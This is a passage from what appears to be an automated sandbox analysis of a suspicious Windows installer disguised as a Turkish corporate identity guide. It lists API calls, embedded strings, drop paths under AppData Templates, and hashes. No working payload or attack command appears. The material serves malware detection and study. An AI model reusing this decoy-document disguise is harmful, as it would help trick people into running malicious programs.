                                                                                                                                                  • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,771A3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                  • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                  • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,771A3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                  • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,771A3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                                                                                                  • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                  • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                                                                                                  • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$Call$\oZ
                                                                                                                                                • API String ID: 2624150263-3954081325
                                                                                                                                                • Opcode ID: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                                • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                                                                                                                                • Opcode Fuzzy Hash: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                                • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146, xrefs: 004021C3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146
                                                                                                                                                • API String ID: 542301482-3016365613
                                                                                                                                                • Opcode ID: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                                                                                                                • Instruction ID: 47658dbbd12ee8008517b47355d5d9d52026a5fb35fba2bce99957a22e6c3eef
                                                                                                                                                • Opcode Fuzzy Hash: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                                                                                                                • Instruction Fuzzy Hash: 8B414C71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB44
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: p!C$p!C
                                                                                                                                                • API String ID: 0-3125587631
                                                                                                                                                • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                • Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
                                                                                                                                                • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                • Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                • Opcode ID: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                                                                                                                • Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
                                                                                                                                                • Opcode Fuzzy Hash: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                                                                                                                • Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                • Instruction ID: 703def0becceeecb9d8561ea32c53bcab4b84ebc773a8a1d0b412cad538f794c
                                                                                                                                                • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                • Instruction Fuzzy Hash: 1EE1797190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                                                                                                                • GetSysColor.USER32(?), ref: 004044D0
                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404573
                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                                                                                                • SetCursor.USER32(00000000), ref: 004045F2
                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040460E
                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                • String ID: Call$N$\oZ$gC@
                                                                                                                                                • API String ID: 3103080414-3313421167
                                                                                                                                                • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                                                                                                                                • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                • DrawTextW.USER32(00000000,Fjernbetjeningsenhedernes Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                • String ID: F$Fjernbetjeningsenhedernes Setup
                                                                                                                                                • API String ID: 941294808-2989215355
                                                                                                                                                • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                                                                                                • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                                                                                                • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                                                                                                                  • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                  • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                                                                                                                                • wsprintfA.USER32 ref: 00405F85
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                                                                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                                                                                                  • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                  • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                                                • Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                                • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                                                                                                                                • Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                                • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,771A3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,771A3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,771A3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040654F, 00406554
                                                                                                                                                • *?|<>/":, xrefs: 004065A0
                                                                                                                                                • "C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe", xrefs: 0040654E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                • String ID: "C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                • API String ID: 589700163-2792932562
                                                                                                                                                • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                                                                                                • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                                                                                                                • GetSysColor.USER32(00000000), ref: 004042F3
                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 0040430B
                                                                                                                                                • GetSysColor.USER32(?), ref: 0040431E
                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                                                                                                • DeleteObject.GDI32(?), ref: 00404348
                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
